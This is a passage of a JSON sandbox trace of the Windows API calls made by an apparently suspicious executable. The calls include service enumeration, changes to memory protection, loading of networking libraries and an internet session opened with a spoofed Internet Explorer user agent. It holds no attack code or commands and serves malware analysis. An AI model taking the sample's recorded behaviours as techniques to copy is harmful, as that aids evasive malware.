"OpenSCManagerA", "status": true, "return": "0x0070b208", "arguments": [ { "name": "MachineName", "value": "" }, { "name": "DatabaseName", "value": "" }, { "name": "DesiredAccess", "value": "0x00000004", "pretty_value": "SC_MANAGER_ENUMERATE_SERVICE" } ], "repeated": 0, "id": 363 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 364 }, { "timestamp": "2025-02-27 23:34:21,847", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 365 }, { "timestamp": "2025-02-27 23:34:21,909", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 366 }, { "timestamp": "2025-02-27 23:34:21,956", "thread_id": "2840", "caller": "0x00561d9a", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00401000" }, { "name": "ModuleName", "value": "f1ffd3c13b7bd7f498e8.exe" }, { "name": "NumberOfBytesProtected", "value": "0x00140000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000020", "pretty_value": "PAGE_EXECUTE_READ" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 367 }, { "timestamp": "2025-02-27 23:34:21,972", "thread_id": "2840", "caller": "0x00569d48", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wininet" }, { "name": "DllBase", "value": "0x72ae0000" } ], "repeated": 0, "id": 368 }, { "timestamp": "2025-02-27 23:34:22,175", "thread_id": "2840", "caller": "0x00569d48", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 369 }, { "timestamp": "2025-02-27 23:34:22,175", "thread_id": "2840", "caller": "0x00569d48", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "wininet.dll" }, { "name": "BaseAddress", "value": "0x72ae0000" } ], "repeated": 4, "id": 370 }, { "timestamp": "2025-02-27 23:34:22,175", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 371 }, { "timestamp": "2025-02-27 23:34:22,175", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\srvcli" }, { "name": "DllBase", "value": "0x73920000" } ], "repeated": 0, "id": 372 }, { "timestamp": "2025-02-27 23:34:22,191", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\netutils" }, { "name": "DllBase", "value": "0x74a90000" } ], "repeated": 0, "id": 373 }, { "timestamp": "2025-02-27 23:34:22,206", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\shcore" }, { "name": "DllBase", "value": "0x75bb0000" } ], "repeated": 0, "id": 374 }, { "timestamp": "2025-02-27 23:34:22,206", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\iertutil" }, { "name": "DllBase", "value": "0x728a0000" } ], "repeated": 0, "id": 375 }, { "timestamp": "2025-02-27 23:34:22,222", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "2840" }, { "name": "Module", "value": "KERNELBASE.dll" }, { "name": "Return Address", "value": "0x76518e0c" } ], "repeated": 0, "id": 376 }, { "timestamp": "2025-02-27 23:34:22,362", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 377 }, { "timestamp": "2025-02-27 23:34:22,378", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\Wldp" }, { "name": "DllBase", "value": "0x743b0000" } ], "repeated": 0, "id": 378 }, { "timestamp": "2025-02-27 23:34:22,425", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\windows.storage" }, { "name": "DllBase", "value": "0x743e0000" } ], "repeated": 0, "id": 379 }, { "timestamp": "2025-02-27 23:34:22,487", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\profapi" }, { "name": "DllBase", "value": "0x74a50000" } ], "repeated": 0, "id": 380 }, { "timestamp": "2025-02-27 23:34:22,487", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 381 }, { "timestamp": "2025-02-27 23:34:22,487", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "user32.dll" }, { "name": "BaseAddress", "value": "0x76610000" } ], "repeated": 0, "id": 382 }, { "timestamp": "2025-02-27 23:34:22,487", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\ondemandconnroutehelper" }, { "name": "DllBase", "value": "0x73900000" } ], "repeated": 0, "id": 383 }, { "timestamp": "2025-02-27 23:34:22,519", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "ondemandconnroutehelper.dll" }, { "name": "BaseAddress", "value": "0x73900000" } ], "repeated": 0, "id": 384 }, { "timestamp": "2025-02-27 23:34:22,519", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\winhttp" }, { "name": "DllBase", "value": "0x73ca0000" } ], "repeated": 0, "id": 385 }, { "timestamp": "2025-02-27 23:34:22,534", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "winhttp.dll" }, { "name": "BaseAddress", "value": "0x73ca0000" } ], "repeated": 1, "id": 386 }, { "timestamp": "2025-02-27 23:34:22,534", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\kernel.appcore" }, { "name": "DllBase", "value": "0x74f00000" } ], "repeated": 0, "id": 387 }, { "timestamp": "2025-02-27 23:34:22,534", "thread_id": "11160", "caller": "0x771a204e", "parentcaller": "0x7719ddc1", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000007c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 1, "id": 388 }, { "timestamp": "2025-02-27 23:34:22,550", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll" }, { "name": "BaseAddress", "value": "0x73900000" } ], "repeated": 0, "id": 389 }, { "timestamp": "2025-02-27 23:34:22,550", "thread_id": "11160", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 390 }, { "timestamp": "2025-02-27 23:34:22,550", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0004", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 391 }, { "timestamp": "2025-02-27 23:34:22,550", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 392 }, { "timestamp": "2025-02-27 23:34:22,550", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0004" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 393 }, { "timestamp": "2025-02-27 23:34:22,550", "thread_id": "11160", "caller": "0x72df9b22", "parentcaller": "0x72df9989", "category": "network", "api": "WSAStartup", "status": true, "return": "0x00000000", "arguments": [ { "name": "VersionRequested", "value": "0x00000202" } ], "repeated": 0, "id": 394 }, { "timestamp": "2025-02-27 23:34:22,550", "thread_id": "11160", "caller": "0x764e1c36", "parentcaller": "0x76ffab4f", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\mswsock" }, { "name": "DllBase", "value": "0x71a30000" } ], "repeated": 0, "id": 395 }, { "timestamp": "2025-02-27 23:34:22,566", "thread_id": "11160", "caller": "0x764e1c36", "parentcaller": "0x76ffab4f", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\mswsock.dll" }, { "name": "BaseAddress", "value": "0x71a30000" } ], "repeated": 0, "id": 396 }, { "timestamp": "2025-02-27 23:34:22,566", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\IPHLPAPI" }, { "name": "DllBase", "value": "0x71e20000" } ], "repeated": 0, "id": 397 }, { "timestamp": "2025-02-27 23:34:22,566", "thread_id": "11160", "caller": "0x764e1c36", "parentcaller": "0x76ffab4f", "category": "network", "api": "socket", "status": true, "return": "0x00000350", "arguments": [ { "name": "af", "value": "23", "pretty_value": "AF_INET6" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "848" } ], "repeated": 0, "id": 398 }, { "timestamp": "2025-02-27 23:34:22,566", "thread_id": "11160", "caller": "0x72df9b93", "parentcaller": "0x72df9989", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "848" }, { "name": "level", "value": "0x00000029" }, { "name": "optname", "value": "0x0000001b" }, { "name": "optval", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 399 }, { "timestamp": "2025-02-27 23:34:22,566", "thread_id": "11160", "caller": "0x71a3a5a3", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000350" }, { "name": "IoControlCode", "value": "0x000120b3" }, { "name": "InputBuffer", "value": "\\x17\\x00" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x00\\x00\\x1a\\x00\\x17\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\xef\\xca\\x92f_!\\x11\\x1a\\x07\\x00\\x00\\x00\\x1a\\x00\\x17\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xc0\\xa8z\\x0c\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 400 }, { "timestamp": "2025-02-27 23:34:22,566", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000103", "arguments": [ { "name": "FileHandle", "value": "0x00000350" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19\\x00\\x00\\xc8\\x01\\x00\\x00\\x00\\x10\\xe3r\\x00L\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x00\\x00$\\xe3r\\x00\\x1c\\x00\\x00\\x00@\\xe3r\\x00\\x1c\\x00\\x00\\x00" } ], "repeated": 0, "id": 401 }, { "timestamp": "2025-02-27 23:34:22,566", "thread_id": "11160", "caller": "0x71a3aaa5", "parentcaller": "0x71a3a83c", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000348" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 402 }, { "timestamp": "2025-02-27 23:34:22,566", "thread_id": "11160", "caller": "0x72df9cff", "parentcaller": "0x72df9989", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "848" } ], "repeated": 0, "id": 403 }, { "timestamp": "2025-02-27 23:34:22,566", "thread_id": "11160", "caller": "0x771a204e", "parentcaller": "0x7719e4ad", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000007c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 404 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 405 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771a204e", "parentcaller": "0x7719e4ad", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000007c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 1, "id": 406 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\NSI" }, { "name": "DllBase", "value": "0x75b20000" } ], "repeated": 0, "id": 407 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771a1568", "parentcaller": "0x7719f2d9", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "WINNSI.DLL" } ], "repeated": 0, "id": 408 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771a260c", "parentcaller": "0x771a2516", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\winnsi.dll" } ], "repeated": 0, "id": 409 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771aeb5c", "parentcaller": "0x771ae8a8", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000031c" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\winnsi.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 410 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771aeb99", "parentcaller": "0x771ae8a8", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000034c" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x0000031c" } ], "repeated": 0, "id": 411 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771a16fc", "parentcaller": "0x771a1867", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000034c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73990000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00008000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 412 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771b23a8", "parentcaller": "0x771b2331", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 413 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771b23a8", "parentcaller": "0x771b2361", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 414 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771b26e6", "parentcaller": "0x7719b730", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73995000" }, { "name": "ModuleName", "value": "WINNSI.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 415 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771aebed", "parentcaller": "0x771ae8a8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000034c" } ], "repeated": 0, "id": 416 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771aebf5", "parentcaller": "0x771ae8a8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000031c" } ], "repeated": 0, "id": 417 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771a1142", "parentcaller": "0x7718e5b3", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73995000" }, { "name": "ModuleName", "value": "WINNSI.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 418 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11160", "caller": "0x771a1142", "parentcaller": "0x7718e5b3", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\WINNSI" }, { "name": "DllBase", "value": "0x73990000" } ], "repeated": 0, "id": 419 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "winhttp.dll" }, { "name": "BaseAddress", "value": "0x73ca0000" } ], "repeated": 0, "id": 420 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll" }, { "name": "BaseAddress", "value": "0x73900000" } ], "repeated": 0, "id": 421 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "winhttp.dll" }, { "name": "BaseAddress", "value": "0x73ca0000" } ], "repeated": 0, "id": 422 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 1, "id": 423 }, { "timestamp": "2025-02-27 23:34:22,581", "thread_id": "11036", "caller": "0x771a204e", "parentcaller": "0x7719ddc1", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000007c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 424 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11160", "caller": "0x7719e012", "parentcaller": "0x771a1d43", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\winnsi" }, { "name": "BaseAddress", "value": "0x73990000" }, { "name": "InitRoutine", "value": "0x73992220" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 425 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11160", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x71e4e000" }, { "name": "ModuleName", "value": "IPHLPAPI.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 426 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11160", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x71e4e000" }, { "name": "ModuleName", "value": "IPHLPAPI.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 427 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11160", "caller": "0x764fdce4", "parentcaller": "0x76f68bc0", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000398" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 428 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11160", "caller": "0x75b21aad", "parentcaller": "0x73991a69", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000354" }, { "name": "IoControlCode", "value": "0x0012000f" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfb,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": 